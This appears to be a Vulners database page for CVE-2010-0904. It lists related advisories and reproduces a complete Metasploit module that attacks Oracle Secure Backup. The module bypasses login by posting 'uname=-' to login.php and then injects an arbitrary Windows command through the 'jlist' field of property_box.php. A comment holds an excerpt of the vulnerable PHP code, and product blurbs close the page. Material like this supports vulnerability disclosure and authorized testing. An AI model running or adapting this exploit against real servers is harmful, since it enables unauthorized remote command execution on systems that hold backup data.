| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Oracle Secure Backup Authentication Bypass/Command Injection | 19 Aug 201100:00 | – | zdt | |
| CVE-2010-0904 | 19 Aug 201100:00 | – | circl | |
| Oracle Secure Backup Administration Server uname Var Authentication Bypass (CVE-2010-0904) | 16 Aug 201000:00 | – | checkpoint_advisories | |
| CVE-2010-0904 | 13 Jul 201022:07 | – | cve | |
| CVE-2010-0904 | 13 Jul 201022:07 | – | cvelist | |
| Oracle Secure Backup - Authentication Bypass/Command Injection (Metasploit) | 19 Aug 201100:00 | – | exploitdb | |
| Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability | 20 Jul 201021:57 | – | metasploit | |
| Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability | 19 Aug 201118:35 | – | metasploit | |
| CVE-2010-0904 | 13 Jul 201022:30 | – | nvd | |
| Oracle Critical Patch Update Advisory - July 2010 | 13 Jul 201000:00 | – | oracle |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in login.php in order to execute arbitrary code via a command injection
vulnerability in property_box.php. This module was tested
against Oracle Secure Backup version 10.3.0.1.0 (Win32).
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-0904' ],
[ 'OSVDB', '66338'],
[ 'ZDI', '10-118' ],
],
'DisclosureDate' => '2010-07-13'))
register_options(
[
Opt::RPORT(443),
OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
OptBool.new('SSL', [true, 'Use SSL', true]),
])
end
def run
cmd = datastore['CMD']
res = send_request_cgi(
{
'uri' => '/login.php',
'data' => 'attempt=1&uname=-',
'method' => 'POST',
}, 5)
if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
print_status("Sending command: #{datastore['CMD']}...")
send_request_cgi(
{
'uri' => '/property_box.php',
'data' => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),
'cookie' => res.get_cookies,
'method' => 'POST',
}, 5)
print_status("Done.")
else
print_error("Invalid PHPSESSION token..")
return
end
end
end
=begin
else if (strcmp($type, "Job") == 0)
{
if (!is_array($objectname))
$objectname = array();
reset($objectname);
while (list(,$oname) = each($objectname))
{
$oname = escapeshellarg($oname);
$jlist = "$jlist $oname";
}
if (strlen($jlist) > 0)
$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
=end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation